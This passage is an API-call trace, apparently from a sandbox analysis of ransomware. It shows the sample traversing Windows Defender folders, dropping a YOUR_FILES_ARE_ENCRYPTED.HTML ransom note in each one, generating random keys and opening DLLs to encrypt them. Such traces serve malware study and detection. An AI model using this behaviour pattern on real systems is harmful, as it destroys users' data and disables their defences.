ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="..", cAlternateFileName="")) returned 1 [0107.347] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="..", cAlternateFileName="")) returned 0 [0107.347] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.347] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Clean Store\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0107.347] GetProcessHeap () returned 0x600000 [0107.347] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.347] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Clean Store\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\clean store\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.361] WriteFile (in: hFile=0x31c, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.362] CloseHandle (hObject=0x31c) returned 1 [0107.362] GetProcessHeap () returned 0x600000 [0107.362] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.362] GetProcessHeap () returned 0x600000 [0107.362] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x682358 | out: hHeap=0x600000) returned 1 [0107.363] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Definition Updates", cAlternateFileName="DEFINI~1")) returned 1 [0107.363] StrStrIW (lpFirst="Definition Updates", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.363] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates") returned 64 [0107.363] GetProcessHeap () returned 0x600000 [0107.363] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x682358 [0107.365] lstrcpyW (in: lpString1=0x682358, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates" [0107.365] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*" [0107.365] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0107.365] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="..", cAlternateFileName="")) returned 1 [0107.365] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="Backup", cAlternateFileName="")) returned 1 [0107.365] StrStrIW (lpFirst="Backup", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.365] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned 71 [0107.365] GetProcessHeap () returned 0x600000 [0107.365] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x692360 [0107.366] lstrcpyW (in: lpString1=0x692360, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup" [0107.366] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*" [0107.366] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x626978 [0107.367] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0107.367] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 0 [0107.368] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0107.368] wnsprintfW (in: pszDest=0x692360, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0107.368] GetProcessHeap () returned 0x600000 [0107.368] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ef9e0 [0107.368] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\backup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0107.368] WriteFile (in: hFile=0x310, lpBuffer=0x6ef9e0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6ef9e0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.369] CloseHandle (hObject=0x310) returned 1 [0107.370] GetProcessHeap () returned 0x600000 [0107.370] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ef9e0 | out: hHeap=0x600000) returned 1 [0107.370] GetProcessHeap () returned 0x600000 [0107.370] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x692360 | out: hHeap=0x600000) returned 1 [0107.371] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="Default", cAlternateFileName="")) returned 1 [0107.371] StrStrIW (lpFirst="Default", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.371] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default") returned 72 [0107.371] GetProcessHeap () returned 0x600000 [0107.371] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x692360 [0107.372] lstrcpyW (in: lpString1=0x692360, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default" [0107.372] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\*" [0107.372] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x626878 [0107.394] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0107.394] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x122870, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="GapaEngine.dll", cAlternateFileName="")) returned 1 [0107.394] StrStrIW (lpFirst="GapaEngine.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.394] wnsprintfW (in: pszDest=0x692360, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\GapaEngine.dll") returned 87 [0107.394] PathFindExtensionW (pszPath="GapaEngine.dll") returned=".dll" [0107.394] lstrlenW (lpString=".dll") returned 4 [0107.394] PathFindExtensionW (pszPath="GapaEngine.dll") returned=".dll" [0107.394] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0107.394] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\GapaEngine.dll" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\default\\gapaengine.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0107.395] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3226d0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe3226d0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe36eb85, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2060ab0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="MpAsBase.vdm", cAlternateFileName="")) returned 1 [0107.395] StrStrIW (lpFirst="MpAsBase.vdm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.395] wnsprintfW (in: pszDest=0x692360, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\MpAsBase.vdm") returned 85 [0107.395] PathFindExtensionW (pszPath="MpAsBase.vdm") returned=".vdm" [0107.395] lstrlenW (lpString=".vdm") returned 4 [0107.395] PathFindExtensionW (pszPath="MpAsBase.vdm") returned=".vdm" [0107.395] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3226d0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe3226d0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe3226d0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x283f18, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="MpAsDlta.vdm", cAlternateFileName="")) returned 1 [0107.395] StrStrIW (lpFirst="MpAsDlta.vdm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.395] wnsprintfW (in: pszDest=0x692360, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\MpAsDlta.vdm") returned 85 [0107.395] PathFindExtensionW (pszPath="MpAsDlta.vdm") returned=".vdm" [0107.395] lstrlenW (lpString=".vdm") returned 4 [0107.395] PathFindExtensionW (pszPath="MpAsDlta.vdm") returned=".vdm" [0107.395] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36eb85, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe36eb85, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe42d742, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b6f4a0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="MpAvBase.vdm", cAlternateFileName="")) returned 1 [0107.395] StrStrIW (lpFirst="MpAvBase.vdm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.395] wnsprintfW (in: pszDest=0x692360, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\MpAvBase.vdm") returned 85 [0107.395] PathFindExtensionW (pszPath="MpAvBase.vdm") returned=".vdm" [0107.395] lstrlenW (lpString=".vdm") returned 4 [0107.395] PathFindExtensionW (pszPath="MpAvBase.vdm") returned=".vdm" [0107.395] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3226d0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe3226d0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe3226d0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x63f110, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="MpAvDlta.vdm", cAlternateFileName="")) returned 1 [0107.395] StrStrIW (lpFirst="MpAvDlta.vdm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.396] wnsprintfW (in: pszDest=0x692360, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\MpAvDlta.vdm") returned 85 [0107.396] PathFindExtensionW (pszPath="MpAvDlta.vdm") returned=".vdm" [0107.396] lstrlenW (lpString=".vdm") returned 4 [0107.396] PathFindExtensionW (pszPath="MpAvDlta.vdm") returned=".vdm" [0107.396] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe3226d0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa8cc80, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="MpEngine.dll", cAlternateFileName="")) returned 1 [0107.396] StrStrIW (lpFirst="MpEngine.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.396] wnsprintfW (in: pszDest=0x692360, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\MpEngine.dll") returned 85 [0107.396] PathFindExtensionW (pszPath="MpEngine.dll") returned=".dll" [0107.396] lstrlenW (lpString=".dll") returned 4 [0107.396] PathFindExtensionW (pszPath="MpEngine.dll") returned=".dll" [0107.396] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0107.396] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\MpEngine.dll" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\default\\mpengine.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0107.396] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd1d10, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="NisBase.vdm", cAlternateFileName="")) returned 1 [0107.396] StrStrIW (lpFirst="NisBase.vdm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.396] wnsprintfW (in: pszDest=0x692360, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\NisBase.vdm") returned 84 [0107.396] PathFindExtensionW (pszPath="NisBase.vdm") returned=".vdm" [0107.396] lstrlenW (lpString=".vdm") returned 4 [0107.396] PathFindExtensionW (pszPath="NisBase.vdm") returned=".vdm" [0107.396] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3aa0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="NisFull.vdm", cAlternateFileName="")) returned 1 [0107.396] StrStrIW (lpFirst="NisFull.vdm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.396] wnsprintfW (in: pszDest=0x692360, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\NisFull.vdm") returned 84 [0107.396] PathFindExtensionW (pszPath="NisFull.vdm") returned=".vdm" [0107.396] lstrlenW (lpString=".vdm") returned 4 [0107.396] PathFindExtensionW (pszPath="NisFull.vdm") returned=".vdm" [0107.396] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3aa0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="NisFull.vdm", cAlternateFileName="")) returned 0 [0107.396] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0107.397] wnsprintfW (in: pszDest=0x692360, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0107.397] GetProcessHeap () returned 0x600000 [0107.397] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6f19f0 [0107.398] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Default\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\default\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0107.398] WriteFile (in: hFile=0x310, lpBuffer=0x6f19f0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6f19f0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.399] CloseHandle (hObject=0x310) returned 1 [0107.400] GetProcessHeap () returned 0x600000 [0107.400] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6f19f0 | out: hHeap=0x600000) returned 1 [0107.400] GetProcessHeap () returned 0x600000 [0107.400] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x692360 | out: hHeap=0x600000) returned 1 [0107.401] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="NisBackup", cAlternateFileName="NISBAC~1")) returned 1 [0107.401] StrStrIW (lpFirst="NisBackup", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.401] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup") returned 74 [0107.401] GetProcessHeap () returned 0x600000 [0107.401] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x692360 [0107.402] lstrcpyW (in: lpString1=0x692360, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup" [0107.402] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup\\*" [0107.402] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, 